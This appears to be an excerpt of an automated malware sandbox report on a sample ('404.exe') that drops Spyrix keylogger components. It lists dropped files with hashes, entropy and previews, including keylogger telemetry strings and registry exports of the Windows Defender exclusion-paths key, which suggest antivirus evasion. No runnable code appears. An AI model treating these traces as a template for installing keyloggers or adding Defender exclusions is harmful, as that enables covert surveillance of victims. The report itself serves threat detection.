                                                                                                                                                                                                                                                          SSDEEP:6:FBWRglCkrMdBRzDCEzUwXVXLbsK/VbdYgfiE3T+tD0UDiA7TGCGJJpLZXvc54:LWTkrMdBpFXVXLbTdbdAEkZmZ/c54
                                                                                                                                                                                                                                                          MD5:895CCE21255078C3BCFD4F0C98C39679
                                                                                                                                                                                                                                                          SHA1:8F651172B7A728D7DD59A2AE151D3B8660316CB0
                                                                                                                                                                                                                                                          SHA-256:5DBBC77B22CAF3BDFF15E4800FE6612C84512E2FCE77CE6723E260D3851C1C9A
                                                                                                                                                                                                                                                          SHA-512:92660FCE8338004130FB99B5806566C627AD76D80483975FE2E1D9DE3DC72530A2B7E81820618BBFDD1EFAD5E6B1C13CE8DB24312097886382F9C8E3F1904ACF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:&action=app:Run:First&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:42.143&prg_lng=english&os_caption= ()&os_type=windows&os_country_code=&time_shift=-5&os_install_date=-- ::&av=Windows Defender&dnet=4.8.04084&trial_id=-1&license=&prg_seconds=6&token=0af6a2771d4996c012b3ba995de6ac94
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (420), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):420
                                                                                                                                                                                                                                                          Entropy (8bit):5.145874851358482
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:L/f+JHkrMdBpFXVXLbTG0H/bdAEkZT3hU7:b+JErABtbZTdATxW
                                                                                                                                                                                                                                                          MD5:04B3DE60E152EE225AEAC393194EC8CB
                                                                                                                                                                                                                                                          SHA1:F92E95009997517A339B87EBB1E7CDB1DD3C9C35
                                                                                                                                                                                                                                                          SHA-256:21307C778BBFD5D72AD8D436566E90494E392AD2927D9335E74AD373763E16D7
                                                                                                                                                                                                                                                          SHA-512:07615CB1BBA8F243A147B1307C5E502537EEB5AF813E5560478CC7B10EB540B32C0A611C58EBEB6DD97645890A0A37619AA6D2C6ABEF2DCF32ABFBC414DF3353
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:&action=app:wizard:Start&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:47.612&prg_lng=english&os_caption= ()&os_type=windows&os_country_code=&time_shift=-5&os_install_date=-- ::&av=Windows Defender&dnet=4.8.04084&trial_id=-1&license=&prg_seconds=12&token=81271d438c0b3becf27c434f944d5b62
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3013000, file counter 10, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                          Entropy (8bit):1.2331965195647687
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:TLmoez2/2EivyGIEU+hJljYCNEXRKENC4yjroOlftsOlUN8:TaLa/2pacXHfGXIENC4iZlXlUG
                                                                                                                                                                                                                                                          MD5:369AD8AB38BEDC8CF128B365903D37E0
                                                                                                                                                                                                                                                          SHA1:0821FBA4C5543BB4F7D928781BB4482963074D24
                                                                                                                                                                                                                                                          SHA-256:99C2AB0C063DC41F78B8D45677A61F84C68BD3AE2E0E98FF75F24BB2A45B7E35
                                                                                                                                                                                                                                                          SHA-512:BD68DC0D850248EBCB0B1FBE772510D0AF16365F86CD8EE0C336901F2E539519F640112631D8F79D1B516F84C719A3CB2C9281A79A16FA2AE457FAF0D2E83927
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .........................................................................-.............;........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):16928
                                                                                                                                                                                                                                                          Entropy (8bit):1.1204403775323835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:7MXTO1HfGXIENC4iZlXl0nq25La/2paEC:7AOIXIMMLV4Lh3u
                                                                                                                                                                                                                                                          MD5:712A9075E108DE535BECB0A4A1AB2EBD
                                                                                                                                                                                                                                                          SHA1:1A4EE42F51E21EE69CA678B5EF6BF7B4ADAED6F3
                                                                                                                                                                                                                                                          SHA-256:E11667AC63F316791E7FC0F6B8C9BBD94353CDC2B2DBA9ECCB9DC3AD8969736D
                                                                                                                                                                                                                                                          SHA-512:8B695626CE120C3A955C10585215D33C5C875BE2D908F9B89FA01127F2ADDB2824D494DFC8E56381C78A42A6C9E07654F3061DFA672C5301BBF3033372A7FB4A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.... .c.....$.w...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................=..........u.Y.=..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36
                                                                                                                                                                                                                                                          Entropy (8bit):4.593400348604437
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:PouVKQzhquIw27n:h4Qzhqfn
                                                                                                                                                                                                                                                          MD5:179EC8DFA22BD8C472285A4F01C3879C
                                                                                                                                                                                                                                                          SHA1:C7F2C43F00D5D69B7C534EF9F7BB4D5EEACDDFA6
                                                                                                                                                                                                                                                          SHA-256:5CA8C7050FF095DB093320A34382CB8859E9BE94795F1A7605B1BE1232D67668
                                                                                                                                                                                                                                                          SHA-512:E0DE299D4E8173857050BFFF6FDDF93CF88471490F072C904124F685124B80AD5AB84B119F55B75281EE3E4E9BA688593842F7BF1A78FE650F41A7FEC2A6888B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en-US">
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\404.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1119
                                                                                                                                                                                                                                                          Entropy (8bit):5.345080863654519
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                                                                                                                                                                          MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                                                                                                                                                                          SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                                                                                                                                                                          SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                                                                                                                                                                          SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:@...e...........................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                          File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):236
                                                                                                                                                                                                                                                          Entropy (8bit):3.6440699182134826
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:Qyk+SkWCiiCRroZ6IJlUAG+DZKHWn+SkUkDkqOEcRKw:Qy5hVZteAxDZaW+oVd3
                                                                                                                                                                                                                                                          MD5:0A7F333C72BA23F66948D2F7ACAF391E
                                                                                                                                                                                                                                                          SHA1:4E232F923162508127336631C7A734982795FC6F
                                                                                                                                                                                                                                                          SHA-256:C0E694FE96F168B2E1C2C6710E2DA625849F72A5260AC6F8AFD7B399B82C7026
                                                                                                                                                                                                                                                          SHA-512:E770D89B07783F9EDBD8F13D0D369CB3CF59BD666BDEA34276EB29FB8334A413A3F8159C9FD235CF9710937EE29838AA0665EC4CDC3B03204AE353B2EF1F2A91
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.P.a.t.h.s.].........
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                          File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):236
                                                                                                                                                                                                                                                          Entropy (8bit):3.6440699182134826
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:Qyk+SkWCiiCRroZ6IJlUAG+DZKHWn+SkUkDkqOEcRKw:Qy5hVZteAxDZaW+oVd3
                                                                                                                                                                                                                                                          MD5:0A7F333C72BA23F66948D2F7ACAF391E
                                                                                                                                                                                                                                                          SHA1:4E232F923162508127336631C7A734982795FC6F
                                                                                                                                                                                                                                                          SHA-256:C0E694FE96F168B2E1C2C6710E2DA625849F72A5260AC6F8AFD7B399B82C7026
                                                                                                                                                                                                                                                          SHA-512:E770D89B07783F9EDBD8F13D0D369CB3CF59BD666BDEA34276EB29FB8334A413A3F8159C9FD235CF9710937EE29838AA0665EC4CDC3B03204AE353B2EF1F2A91
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.P.a.t.h.s.].........
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
